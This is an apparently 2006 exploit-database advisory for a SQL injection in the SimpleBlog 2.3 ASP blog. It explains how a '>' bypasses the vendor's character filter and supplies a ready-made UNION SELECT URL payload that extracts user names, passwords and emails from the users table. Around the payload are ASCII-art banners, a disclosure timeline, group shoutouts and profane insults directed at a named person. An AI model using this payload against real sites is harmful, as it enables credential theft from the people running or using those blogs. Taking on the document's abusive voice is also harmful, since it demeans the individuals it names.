SimpleBlog 2.3 - 'id' SQL Injection

EDB-ID:

2296




Platform:

ASP

Date:

2006-09-04


                                           _           _        
                                    __   _(_)_ __  ___| |_ __ _ 
                                    \ \ / / | '_ \/ __| __/ _` |
                                     \ V /| | |_) \__ \ || (_| |
                                      \_/ |_| .__/|___/\__\__,_|
                                          |_| AnD
		                               _               _    _ _ _     
                       _ __ ___  _   _ _ __ __| | ___ _ __ ___| | _(_) | |____
                      | '_ ` _ \| | | | '__/ _` |/ _ \ '__/ __| |/ / | | |_  /
                      | | | | | | |_| | | | (_| |  __/ |  \__ \   <| | | |/ / 
                      |_| |_| |_|\__,_|_|  \__,_|\___|_|  |___/_|\_\_|_|_/___|

 		+-----------------------------------------------------------------+
		| Vipsta & MurderSkillz fucking pwnt this webApp                  |
		+-----------------------------------------------------------------+
		| App Name: SimpleBlog 2.3 					  |
		| App Author: 8pixel.net					  |
		| App Version: <= 2.3 						  |
		| App Type: Blog/Journal					  |
		+-----------------------------------------------------------------+
		| DETAILS							  |
		+-----------------------------------------------------------------+
		| Vulnerability: Remote SQL Injection				  |
		| Requirements: Database with UNION support			  |
		| Revisions: Note - This is a revision of another vuln 	          |
		|	            posted by Chironex Fleckeri			  |
		+-----------------------------------------------------------------+
		| CODE								  |
		+-----------------------------------------------------------------+
		| Vendor "implemented" a fix for SQL injection vulnerabilities.   |
		| however this bullshit was easily worked around by		  |
		| Vipsta & MurderSkillz.					  |
		|								  |
		| Vendor attempted to remove illegal characters like ' and =      |
		| which stop most SQL injection vulnerabilities. However:	  |
		| Vendor failed to remove '>' symbol.				  |
		+-----------------------------------------------------------------+
		| EXPLOIT							  |
		+-----------------------------------------------------------------+
		| SQL Injection String:						  |
 +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 | http://[target]/[path]/default.asp?view=plink&id=-1%20UNION%20SELECT%20ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null,null%20FROM%20T_USERS%20WHERE%20id>1  |
 +-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
 		| TIMELINE							  |
		+-----------------------------------------------------------------+
		| 9/2/06 - Vendor Notified.					  |
		| 9/2/06 - Vendor Replied. Threatens legal action.		  |
		| 9/4/06 - Exploit Released with no details to vendor.            |
		+-----------------------------------------------------------------+
		| SHOUTZ							  |
		+-----------------------------------------------------------------+
		| Everyone at g00ns.net - including:				  |
		| 	z3r0, spic, arya (aka nex, aka Lythex), FuRy, Mayo,	  |
		|	TrinTITTY, 0ptix, scuzz, overdose, Cre@mpuff, Riot,	  |
		|	JuNk, CeLe, LaD, NightSins, Zodiac, grumpy, FiSh, pr0be,  |
		|	ReysRaged, milf <3, gio, RedCoat, and all who I forgot!   |
		+-----------------------------------------------------------------+
		| ADDITIONAL NOTES						  |
		+-----------------------------------------------------------------+
		| TeamSpeak: ts.g00ns.net					  |
		| IRC: irc.g00ns.net						  |
		+-----------------------------------------------------------------+
		| PERSONAL STUFF						  |
		+-----------------------------------------------------------------+
		| Sess from g00ns.net IS A FUCKING MORON.                         |
		+-----------------------------------------------------------------+

                                             __ 
                                  ___  ___  / _|
                                 / _ \/ _ \| |_ 
                                |  __/ (_) |  _|
                                 \___|\___/|_|.

# milw0rm.com [2006-09-04]